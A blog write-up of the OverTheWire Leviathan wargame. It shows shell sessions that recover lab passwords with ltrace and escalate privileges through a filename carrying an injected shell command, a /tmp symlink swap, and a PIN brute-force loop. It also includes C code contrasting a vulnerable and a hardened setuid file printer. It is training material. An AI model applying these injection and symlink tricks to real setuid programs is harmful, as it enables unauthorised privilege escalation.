It’s been a while since I’ve had a decent post. Life happened and I’ve started the transition into a new job with an awesome company. I wanted to post something though, even if it’s going to be a short one.

I’m going to start with some write-ups of the OverTheWire wargames, starting with Leviathan. If you haven’t done any of these yet, I suggest you do. I also suggest that, if you are new to the whole Linux thing, you start with Bandit, as it is a great primer.

So. Let’s do this!

Leviathan 0 -> 1

So, first thing we see is a .backup directory containing a bookmarks.html file.

[email protected]:~$ ls -al
total 24
drwxr-xr-x   3 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
drwxr-x---   2 leviathan1 leviathan0 4096 Aug  8 23:10 .backup
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
[email protected]:~$ cd .backup/
[email protected]:~/.backup$ ls -al
total 140
drwxr-x--- 2 leviathan1 leviathan0   4096 Aug  8 23:10 .
drwxr-xr-x 3 root       root         4096 Nov 14  2014 ..
-rw-r----- 1 leviathan1 leviathan0 133259 Nov 14  2014 bookmarks.html

Checking the file for any passwords gives us the Leviathan1 password.

[email protected]:~/.backup$ cat bookmarks.html | grep password
<DT><A HREF="http://leviathan.labs.overthewire.org/passwordus.html | This will be fixed later, the password for 
leviathan1 is rioGegei8m" ADD_DATE="1155384634" LAST_CHARSET="ISO-8859-1" ID="rdf:#$2wIU71">password to 
leviathan1</A>

Leviathan 1 -> 2

This one is slightly more complicated. We have a check ELF that asks us for a password and then exits. Luckily ltrace is installed, so we can easily see from the strcmp() call that it’s looking for sex as the password.

[email protected]:~$ ls -al
total 28
drwxr-xr-x   2 root       root       4096 Nov 14  2014 .
drwxr-xr-x 172 root       root       4096 Jul 10 14:12 ..
-rw-r--r--   1 root       root        220 Apr  9  2014 .bash_logout
-rw-r--r--   1 root       root       3637 Apr  9  2014 .bashrc
-rw-r--r--   1 root       root        675 Apr  9  2014 .profile
-r-sr-x---   1 leviathan2 leviathan1 7493 Nov 14  2014 check
[email protected]:~$ ./check
password: pas
Wrong password, Good Bye ...
[email protected]:~$ ltrace ./check
__libc_start_main(0x804852d, 1, 0xffffd7b4, 0x80485f0 <unfinished ...>
printf("password: ")                                                         = 10
getchar(0x8048680, 47, 0x804a000, 0x8048642password: pas
)                                 = 112
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 97
getchar(0x8048680, 47, 0x804a000, 0x8048642)                                 = 115
strcmp("pas", "sex")                                                         = -1
puts("Wrong password, Good Bye ..."Wrong password, Good Bye ...
)                                         = 29
+++ exited (status 0) +++
[email protected]:~$ ./check
password: sex
$ id
uid=12001(leviathan1) gid=12001(leviathan1) euid=12002(leviathan2) groups=12002(leviathan2),12001(leviathan1)
$ cat /etc/leviathan_pass/leviathan2
ougahZi8Ta

Leviathan 2 -> 3

I have a love/hate relationship with this one. It’s another ELF that prints the contents of whatever file you feed it, assuming the current user has permission to read it. The problem is, I don’t have permission on the file I want to print.

[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile /etc/leviathan_pass/leviathan3
You cant have that file...

Using ltrace again, we can see it’s using access() to check whether we have permission on the file, then building the string "/bin/cat <filename>" with snprintf() and handing it to system(). The file name goes into that shell command unescaped.

[email protected]:/tmp/tmp.xBI5xmyitP$ ltrace ~/printfile test
__libc_start_main(0x804852d, 2, 0xffffd754, 0x8048600 <unfinished ...>
access("test", 4)                                                            = 0
snprintf("/bin/cat test", 511, "/bin/cat %s", "test")                        = 13
system("/bin/cat test" <no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 0
+++ exited (status 0) +++

I tried a few things using file names and confirmed the EUID is leviathan3. Another quick change to the file name and BAM! We got our password.

[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ id
[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ bash
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ id
/bin/cat: test: Permission denied
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test;\;\ bash
/bin/cat: test: Permission denied
-bash: ; bash: command not found
[email protected]:/tmp/tmp.xBI5xmyitP$ bash
[email protected]:/tmp/tmp.xBI5xmyitP$ exit
exit
[email protected]:/tmp/tmp.xBI5xmyitP$ touch test\;\ sh
[email protected]:/tmp/tmp.xBI5xmyitP$ ~/printfile test\;\ sh
/bin/cat: test: Permission denied
$ id
uid=12002(leviathan2) gid=12002(leviathan2) euid=12003(leviathan3) groups=12003(leviathan3),12002(leviathan2)
$ cat /etc/leviathan_pass/leviathan3
Ahdiemoo1j

Leviathan 3 -> 4

This one is the same as level 2, just using ltrace to see the password.

[email protected]:~$ ./level3
Enter the password> pas
bzzzzzzzzap. WRONG
[email protected]:~$ ltrace ./level3
__libc_start_main(0x80485fe, 1, 0xffffd7b4, 0x80486d0 <unfinished ...>
strcmp("h0no33", "kakaka")                                                   = -1
printf("Enter the password> ")                                               = 20
fgets(Enter the password> pass
"pass\n", 256, 0xf7fcac20)                                             = 0xffffd5ac
strcmp("pass\n", "snlprintf\n")                                              = -1
puts("bzzzzzzzzap. WRONG"bzzzzzzzzap. WRONG
)                                                   = 19
+++ exited (status 0) +++
[email protected]:~$ ./level3
Enter the password> snlprintf
[You've got shell]!
$ id
uid=12003(leviathan3) gid=12003(leviathan3) euid=12004(leviathan4) groups=12004(leviathan4),12003(leviathan3)
$ cat /etc/leviathan_pass/leviathan4
vuH0coox6m

Leviathan 4 -> 5

Again, another easy one. An ELF hidden in a .trash directory that spat out some binary. Using Perl, I translated it back to ASCII and got our password for leviathan5.

[email protected]:~/.trash$ ./bin
01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010
[email protected]:~/.trash$ ./bin | perl -lape '$_=pack("(B8)*",@F'
syntax error at -e line 1, at EOF
Execution of -e aborted due to compilation errors.
[email protected]:~/.trash$ ./bin | perl -lape '$_=pack"(B8)*",@F'
Tith4cokei

Leviathan 5 -> 6

Tricky, but not too difficult. The ELF simply prints out the contents of /tmp/file.log, so I just created a symbolic link from file.log to our password file.

[email protected]:~$ ./leviathan5
Cannot find /tmp/file.log
[email protected]:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0
puts("Cannot find /tmp/file.log"Cannot find /tmp/file.log
)                                            = 26
exit(-1 <no return ...>
+++ exited (status 255) +++
[email protected]:~$ touch /tmp/file.log
[email protected]:~$ ltrace ./leviathan5
__libc_start_main(0x80485ed, 1, 0xffffd7a4, 0x8048690 <unfinished ...>
fopen("/tmp/file.log", "r")                                                  = 0x804b008
fgetc(0x804b008)                                                             = '\377'
feof(0x804b008)                                                              = 1
fclose(0x804b008)                                                            = 0
getuid()                                                                     = 12005
setuid(12005)                                                                = 0
unlink("/tmp/file.log")                                                      = 0
+++ exited (status 0) +++
[email protected]:~$ echo test > /tmp/file.log
[email protected]:~$ ./leviathan5
test
[email protected]:~$ ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log; ./leviathan5
UgaoFee4li
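Both level 2 and level 5 fail the same way: a setuid binary touches a user-controlled path while still holding its elevated effective uid. As an added example (not code from the wargame), the vulnerable pattern below is reconstructed from the level 2 ltrace output and placed beside a hardened version; the function names and the 512-byte buffer are assumptions.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* Reconstructed from the ltrace output (an assumption, not the binary's
 * real source): the file name is pasted unescaped into a shell command
 * string, and access() checks the real uid while cat runs as the euid. */
int print_file_vulnerable(const char *path) {
    char cmd[512];
    if (access(path, R_OK) != 0) {
        puts("You cant have that file...");
        return -1;
    }
    snprintf(cmd, sizeof cmd, "/bin/cat %s", path);  /* "test; sh" reaches the shell */
    return system(cmd);
}

/* Hardened equivalent: permanently drop to the real uid first, then open
 * and copy the file ourselves. No shell is involved, so metacharacters in
 * the name are inert, and the kernel's permission check on open() replaces
 * the separate access() check (no check-then-use gap). Once privileges are
 * dropped a symlink can only point where the real user may already read;
 * O_NOFOLLOW is defence in depth against the level 5 /tmp/file.log trick.
 * Returns bytes copied, or -1 on error. */
long print_file_safe(const char *path) {
    uid_t real = getuid();
    if (setresuid(real, real, real) != 0) return -1;   /* drop euid and saved uid */
    int fd = open(path, O_RDONLY | O_NOFOLLOW);
    if (fd < 0) return -1;
    char buf[4096];
    long total = 0;
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) {
        if (write(STDOUT_FILENO, buf, (size_t)n) != n) { close(fd); return -1; }
        total += n;
    }
    close(fd);
    return n < 0 ? -1 : total;
}

int main(int argc, char **argv) {
    if (argc != 2) { fprintf(stderr, "usage: %s <file>\n", argv[0]); return 1; }
    return print_file_safe(argv[1]) < 0 ? 1 : 0;
}
```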

Leviathan 6 -> 7

So we have an ELF that asks for a 4-digit PIN, and ltrace didn’t help us this time.

[email protected]:~$ ./leviathan6
usage: ./leviathan6 <4 digit code>
[email protected]:~$ ./leviathan6 5555
Wrong
[email protected]:~$ ltrace ./leviathan6 6666
__libc_start_main(0x804850d, 2, 0xffffd7a4, 0x8048590 <unfinished ...>
atoi(0xffffd8d0, 0xffffd7a4, 0xffffd7b0, 0xf7e5619d)                         = 6666
puts("Wrong"Wrong
)                                                                = 6
+++ exited (status 6) +++

It’s only a 4-digit PIN, so with a little bash magic we can brute force it.

for i in {0..9}{0..9}{0..9}{0..9}; do ./leviathan6 $i; done
...
Wrong
$ id
uid=12006(leviathan6) gid=12006(leviathan6) euid=12007(leviathan7) groups=12007(leviathan7),12006(leviathan6)
$ cat /etc/leviathan_pass/leviathan7
ahy7MaeBo9

Leviathan 7 -> 8

[email protected]:~$ cat CONGRATULATIONS
Well Done, you seem to have used a *nix system before, now try something more serious.